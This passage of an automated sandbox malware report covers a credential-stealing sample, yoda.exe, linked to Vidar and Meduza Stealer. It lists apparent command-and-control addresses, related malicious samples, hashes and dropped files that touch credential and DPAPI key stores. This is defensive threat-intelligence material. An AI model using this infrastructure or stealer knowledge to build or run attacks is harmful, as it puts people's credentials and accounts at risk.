                                                                                                                                                                                      http://unisolated.invalid/achrome.exe, 0000000F.00000002.2217337654.00000278009C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://anglebug.com/6692chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://issuetracker.google.com/258207403chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://anglebug.com/3502chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://anglebug.com/3623chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://anglebug.com/3625chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://anglebug.com/3624chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://docs.google.com/presentation/Jchrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://t.mIceland.com, 0000000A.00000003.1949840536.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1949809935.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950065296.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950117154.0000000000EEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://anglebug.com/5007chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216326233.00000278006F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 0000000F.00000002.2214915433.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2145015465.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2143157721.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141719403.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149899649.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2146745669.000002780033C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://anglebug.com/3862chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
239.255.255.250 | unknown | Reserved | unknown | unknown | false
172.217.21.36 | www.google.com | United States | 15169 | GOOGLEUS | false
188.245.216.205 | bijutr.shop | Iran (ISLAMIC Republic Of) | 16322 | PARSONLINETehran-IRANIR | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false

IP
192.168.2.4
127.0.0.1
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1581176
Start date and time:2024-12-27 07:08:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:22
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:yoda.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@43/47@5/6
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              • Number of executed functions: 75
                                                                                                                                                                                                              • Number of non-executed functions: 301
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 217.20.58.100, 192.229.221.95, 172.217.19.227, 172.217.19.238, 64.233.161.84, 172.217.17.46, 142.250.181.99, 4.245.163.56, 23.218.208.109, 13.107.246.63
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:09:06 | API Interceptor | 1x Sleep call for process: yoda.exe modified
                                                                                                                                                                                                                                          • 5.78.169.145
                                                                                                                                                                                                                                          ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 188.245.216.205
                                                                                                                                                                                                                                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                          • 5.78.22.227
                                                                                                                                                                                                                                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                          • 46.62.209.95
                                                                                                                                                                                                                                          ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 188.245.211.225
                                                                                                                                                                                                                                          tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 188.245.211.225
                                                                                                                                                                                                                                          m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 188.245.52.94
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 37f463bf4616ecd445d4a1937da06e19
lem.exe | malicious | Vidar
• 149.154.167.99
• 188.245.216.205
markiz.exe | malicious | CredGrabber, Meduza Stealer
• 149.154.167.99
• 188.245.216.205
utkin.exe | malicious | CredGrabber, Meduza Stealer
• 149.154.167.99
• 188.245.216.205
script.ps1 | malicious | Vidar
• 149.154.167.99
• 188.245.216.205
libcurl.dll | malicious | Matanbuchus
• 149.154.167.99
• 188.245.216.205
b8ygJBG5cb.msi | malicious | Unknown
• 149.154.167.99
• 188.245.216.205
setup.msi | malicious | Unknown
• 149.154.167.99
• 188.245.216.205
installer.msi | malicious | Unknown
• 149.154.167.99
• 188.245.216.205
setup.msi | malicious | Unknown
• 149.154.167.99
• 188.245.216.205
setup.msi | malicious | Unknown
• 149.154.167.99
• 188.245.216.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\ProgramData\4EK6XL68GLNY\2NG4E3
lem.exe | malicious | Vidar
script.ps1 | malicious | Vidar
Setup.msi | malicious | Vidar
nB52P46OJD.exe | malicious | Vidar
lem.exe | malicious | Vidar
Setup.exe | malicious | Vidar
xoJxSAotVM.exe | malicious | Vidar
fim3BhyKXP.gif | malicious | Unknown
TMX.exe | malicious | Unknown
file.exe | malicious | Amadey, Vidar
Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):24008
Entropy (8bit):6.062446965815151
Encrypted:false
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: lem.exe, Detection: malicious
• Filename: script.ps1, Detection: malicious
• Filename: Setup.msi, Detection: malicious
• Filename: nB52P46OJD.exe, Detection: malicious
• Filename: lem.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: xoJxSAotVM.exe, Detection: malicious
• Filename: fim3BhyKXP.gif, Detection: malicious
• Filename: TMX.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):10219
Entropy (8bit):4.966520026409024
Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:NPgBOOzJMk67cY82SGrPVYRjDjXK2F6KJzLLwGXtXqWgrjj31jj6OzJMk67cY82s:UYwP62I+Wr3JjkwP62I+Ws
                                                                                                                                                                                                                                                              MD5:381138FA1B1C4C298AD2441898677ED6
                                                                                                                                                                                                                                                              SHA1:B8A0B0ECAAF6F3BBD7C27DD54ACD4BC3366DD0A4
                                                                                                                                                                                                                                                              SHA-256:D4EE07BC2183E3D013B68B080B9E2F603676B27F8B0C95CCA2ED533BC671FAFA
                                                                                                                                                                                                                                                              SHA-512:095C2B1C129C36125FE17ED096FDE58AE0F8AF61527D9AEDCAB379C3221BF09D87F28846E6FA3CF9FE05C750689A2ADFCDD1AB67409780A12A425A33219858EC
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. <assemblyIdentity.. buildType="release".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI-Component".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. optimizePatterns="no".. offlineApply="no".. replacementSettingsVersionRange="0".. replacementVersionRange="6.2-10.0".. scope="MigWiz,Upgrade".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. Downlevel settings -->.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultUserName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultDomainName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsof
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):889
                                                                                                                                                                                                                                                              Entropy (8bit):5.016955029110262
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:p/o2e8ZR+Vj3Xg0cjAkt3QbENgwnwJXMFhUK:22e8v+VrgfAbIggwJuX
                                                                                                                                                                                                                                                              MD5:2948FF1C0804EC7DB473BB77EB3FBE4E
                                                                                                                                                                                                                                                              SHA1:98A97AFC0E4E2B09A17AA0746F455DFD24356357
                                                                                                                                                                                                                                                              SHA-256:2F6B99F5915A462CAFF60950839E1498F12C9F8194DB3DA02251C5BD2CAD700E
                                                                                                                                                                                                                                                              SHA-512:8393B3AE7D44A4DD85D05D48768F9123910E603C477A3CACC6BF12D03D464959EC01A293B0B3317B0F8470A76D71F695098AE211DD6200D8F7F21E1C757F4EDA
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Security-NGC-PopKeySrv".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. offlineApply="no".. scope="Upgrade,Data".. settingsVersion="3".. replacementSettingsVersionRange="0-2" .. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\* [*]</pattern>.. </objectSet>.. </include>.. </rules>.. </migXml>.. </migration>..</assembly>..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3019
                                                                                                                                                                                                                                                              Entropy (8bit):4.884926762491409
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:22e8z2j+YgfH0LeIg6aFnJmINGbYgaFnQ7sPvh27+QgL7sYN2b4waFnw+:22X2qD0SPJv1/Pvh2S/pVN
                                                                                                                                                                                                                                                              MD5:63F04FB9936532B21E616E88E3EBED14
                                                                                                                                                                                                                                                              SHA1:56CEC96A0D4B10C6FC28C726B76BEF278CBC512F
                                                                                                                                                                                                                                                              SHA-256:61C5B3D0FD4051236AD00A0A39BE2F75F7E0DEC2AFBFF85617AED19AEF3FC650
                                                                                                                                                                                                                                                              SHA-512:66FF4756CE723378126DC6C1EC493B665D08387B3305A97ED9A80500CCCE6001DFB7F8957E8246C7C572D0362DA49EEC7AF8451B849F9E0E89FD8E14041CE75D
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Extensible-Authentication-Protocol-Host-Service".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0".. replacementVersionRange="6.0-6.1.7150".. scope="Upgrade,MigWiz,USMT".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Methods\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Configuration\
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2829
                                                                                                                                                                                                                                                              Entropy (8bit):5.130068712095974
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:/2e8G+F0Vg8DIIgPdunPduPPduNJ7IgfCfikfidjikjirJu/MY4C5uXC5u/C5upL:/29F+cO0Mf7Rwiai5ieiFEMAQSQaQwX4
                                                                                                                                                                                                                                                              MD5:CD55A48FE382A6820EC4FB55A66C2858
                                                                                                                                                                                                                                                              SHA1:70A0A7B0E12DF915BD5E68FF0432637EFC2153DE
                                                                                                                                                                                                                                                              SHA-256:97838AB994B53DFADEEF63955EECB05A7F118C2066EF97B0B0EB7BB48A526451
                                                                                                                                                                                                                                                              SHA-512:37C6D78CCD807B04834659B5E796424C443B2C4F72481CB4080ED1BC5E6A954E47C4AF837A653DDAAFED2372C4FF60CE442170EA58586AB93C57B841449C5195
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. name="Microsoft-Windows-Crypto-keys".. version="0.0.0.0".. processorArchitecture="*".. language="neutral".. />.. <migration scope="Upgrade,MigWiz,USMT" .. replacementVersionRange="6.0-6.1".. replacementSettingsVersionRange="0".. settingsVersion="0" .. >.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\RSA\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\DSS\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\Keys[*]</pattern>.. </objectSet>.. </include>.. </rules>..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1468
                                                                                                                                                                                                                                                              Entropy (8bit):5.0065780470180306
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:p/o2e8GFp8PvMu0Vnu7vFPvJ8+FXg0Mej39ImlQu/kKcCEF4wflBX0FCUK:22e8+8PvMu0VnuRPvJ8+FXgMtImlx3cd
                                                                                                                                                                                                                                                              MD5:E68A33BDAF7AEBE6D5BBBCEFDED6AC5C
                                                                                                                                                                                                                                                              SHA1:A1120341BB4452FCA47EB5EA8FA62A08BFC48073
                                                                                                                                                                                                                                                              SHA-256:A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
                                                                                                                                                                                                                                                              SHA-512:69E1A60C0FFE8AA19B55FABE47801EEEA7CF4C84E426318D8B7BFFAF09A14FC5F569573BE30753D354B604911A616C231F485B08C3778E0A214F7E3DC9C21D2C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="artbaker".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="artbaker".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Cryptography-CryptoConfig-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration xmlns="">.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4309
                                                                                                                                                                                                                                                              Entropy (8bit):5.059776328378613
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:22CBzmeQiHRAQgXx9QgXcOaBIpghKkQlwYBwkbsgo9:MmCZy7BhA
                                                                                                                                                                                                                                                              MD5:3A9306662FE93D09B05B9AE44128BCF1
                                                                                                                                                                                                                                                              SHA1:77A917FFE8FF0EAAD8F3D3B764836C810E4C9DF5
                                                                                                                                                                                                                                                              SHA-256:1988183ECBC3C6987DA9CB598C78B52D7563D995FA94D1E91E0470392E765374
                                                                                                                                                                                                                                                              SHA-512:DA1F2776E8D1E08076032365B0D463DC847A31C6C360181D9966488455E878C7738DEC6F2B39153B2A410E3BEB73A05EB524593D125077273343740826A7B9F9
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-dpapi-keys".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. scope="Upgrade,MigWiz,USMT,Data".. settingsVersion="1".. replacementSettingsVersionRange="0" .. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect [CREDHIST]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect\* [Preferred]</pattern>.. </objectSet>.. </include>.. <merge script="MigXmlHelper.DestinationPriority()">.. <objectSet>..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1065
                                                                                                                                                                                                                                                              Entropy (8bit):4.96984082363901
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:p/o2e8ZF2YS+pg0cjh3N1LRMEF4wuSb3wuyBX0FCUK:22e8z2j+pgfZlMY4Qr0B2A
                                                                                                                                                                                                                                                              MD5:4DBFCA3B87A59186D2612A95CA2CD899
                                                                                                                                                                                                                                                              SHA1:4C84BD2D60CE789B44070CDDC296C09D2F52B1CC
                                                                                                                                                                                                                                                              SHA-256:2C229D8DA31E17FCEF244A8A2029CA8FE8374738A9ECBFED9E23FB89DB8DF059
                                                                                                                                                                                                                                                              SHA-512:704ECDBE3FC38AC3807946072C7C523C36B4AF1586BEFE01A87BBBF35CF20214A0E0DE892A56E74FE8AA806154D7D2B9CC7028AEF47BEC326564B5F18CD12421
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-OneCore-TetheringService".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. replacementSettingsVersionRange="0".. settingsVersion="1".. alwaysProcess="Yes".. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Roaming\*[*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Settings\*[*]</pattern>.. </objectSet>.. </include>.. </rules>..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1095
                                                                                                                                                                                                                                                              Entropy (8bit):4.976174799333973
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
                                                                                                                                                                                                                                                              MD5:ECC51190BD585AB376691BBDDF2A638B
                                                                                                                                                                                                                                                              SHA1:84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
                                                                                                                                                                                                                                                              SHA-256:6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
                                                                                                                                                                                                                                                              SHA-512:C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                                                                              Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                              Malicious:false
Preview:SQLite format 3...
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2947
                                                                                                                                                                                                                                                              Entropy (8bit):5.120077314818075
                                                                                                                                                                                                                                                              Encrypted:false
